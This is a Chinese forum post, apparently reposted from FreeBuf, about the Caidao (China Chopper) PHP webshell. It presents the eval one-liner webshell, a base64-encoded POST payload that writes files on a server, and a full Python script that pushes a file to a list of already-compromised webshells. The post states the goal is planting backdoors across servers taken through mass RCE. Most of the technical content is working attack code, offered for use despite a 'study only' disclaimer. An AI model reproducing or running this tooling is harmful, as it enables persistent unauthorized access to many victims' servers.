搜索
查看: 707|回复: 0

如何基于菜刀PHP一句话实现单个文件批量上传?

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-12-28 14:33:11 | 显示全部楼层 |阅读模式

本文原创作者:安全小飞侠

0×00 前言

很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。

0×01 原理分析

首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。

下面是最常见的php一句话木马:

  1. <?php eval($_POST[1]); ?>
复制代码

当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。

那么,此处的菜刀如何通过简单的一句话就可以实现对服务器的管理和控制呢?通过分析菜刀的原理,我们不难发现菜刀是利用了eval这个函数来执行通过POST方法传过来的命令语句。

因此,如果我们想通过菜刀一句话木马来实现文件上传的话,只需要向远程服务里上包含一句话的url发送一个带文件写入命令的POST请求即可,比如:

POST:

  1. 1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];
复制代码

上面代码包含2个部分:

1. 一句话的密码

2. 发送给服务器端的php执行代码

既然知道原理了,我们只需要发送如下的POST请求即可完成利用一句话上传文件的功能:

POST:

  1. 1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh
复制代码

仔细分析一下这段POST数据包含以下几个部分:

1. 首先是php一句话的密码1

2. 通过eval方法来执行base64解码后的z0,解码整理后显示如下:

  1. @ini_set("display_errors","0");
  2. @set_time_limit(0);
  3. @set_magic_quotes_runtime(0);
  4. echo("->|");;
  5. $f=base64_decode($_POST["z1"]);
  6. $c=base64_decode($_POST["z2"]);
  7. $c=str_replace("\r","",$c);
  8. $c=str_replace("\n","",$c);
  9. $buf="";
  10. for($i=0;$i<strlen($c);$i+=1)   
  11.     $buf.=substr($c,$i,1);
  12. echo(@fwrite(fopen($f,"w"),$buf));
  13. echo("|<-");
  14. die();
复制代码

3. 在z0中继续调用base64解码后的z1和z2,解码后如下:

  1. z1=/var/www/root/1.txt
  2. z2=hello world!
复制代码

至此,我们可以很清楚的发现上面的POST请求的作用实际上是将一个写有hello world!的名为1.txt的文件上传至服务器上/var/www/root/路径下。

0×02 代码实现

基于上面的原理分析,我们可以利用下面的代码基于php一句话来实现文件批量上传:

  1. #!/usr/bin/python  
  2. #coding=utf-8  
  3.   
  4. import urllib  
  5. import urllib2
  6. import sys
  7. import base64
  8. import re
  9.   
  10. def post(url, data):  
  11.     req = urllib2.Request(url)  
  12.     data = urllib.urlencode(data)   
  13.     opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())  
  14.     response = opener.open(req, data)  
  15.     return response.read()  
  16.        
  17. def get_shell_path(posturl,passwd):
  18.     shell_path = ""
  19.     try:
  20.         data = {}
  21.         data[passwd] = '@eval(base64_decode($_POST[z0]));'
  22.         data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
  23.         shell_path = post(posturl, data).strip()
  24.     except Exception:
  25.         pass
  26.     return shell_path
  27.   
  28. def main():
  29.     print '\n+++++++++Batch Uploading Local File (Only for PHP webshell)++++++++++\n'
  30.     shellfile = sys.argv[1] # 存放webshell路径和密码的文件
  31.     localfile = sys.argv[2] # 本地待上传的文件名
  32.     shell_file = open(shellfile,'rb')
  33.     local_content = str(open(localfile,'rb').read())
  34.     for eachline in shell_file:
  35.         posturl = eachline.split(',')[0].strip()
  36.         passwd = eachline.split(',')[1].strip()
  37.         try:
  38.             reg = ".*/([^/]*\.php?)"
  39.             match_shell_name = re.search(reg,eachline)
  40.             if match_shell_name:
  41.                 shell_name=match_shell_name.group(1)
  42.                 shell_path = get_shell_path(posturl,passwd).strip()
  43.                 target_path = shell_path.split(shell_name)[0]+localfile
  44.                 target_path_base64 = base64.b64encode(target_path)
  45.                 target_file_url = eachline.split(shell_name)[0]+localfile
  46.                 data = {}
  47.                 data[passwd] = '@eval(base64_decode($_POST[z0]));'
  48.                 data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7'
  49.                 data['z1']=target_path_base64
  50.                 data['z2']=base64.b64encode(local_content)
  51.                 response = post(posturl, data)
  52.                 if response:
  53.                     print '[+] '+target_file_url+', upload succeed!'
  54.                 else:
  55.                     print '[-] '+target_file_url+', upload failed!'
  56.             else:
  57.                 print '[-] '+posturl+', unsupported webshell!'
  58.         except Exception,e:
  59.             print '[-] '+posturl+', connection failed!'
  60.     shell_file.close()
  61.   
  62. if __name__ == '__main__':  
  63.     main()
复制代码

webshell.txt的格式: [一句话webshell文件路径],[webshell连接密码]如下:

  1. http://www.example1.com/1.php, 1

  2. http://www.example2.com/1.php, 1

  3. http://www.example3.com/1.php, 1
复制代码

保存上面脚本为batch_upload_file.py,执行命令python batch_upload_file.py webshell.txt 1.txt,效果显示如下:

[/url]

[url=http://image.3001.net/images/20151226/14511393995739.png]


声明:仅作学习交流,任何人不可用于非法目的,否则一切后果由其本人承担!

*本篇原创作者:安全小飞侠,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表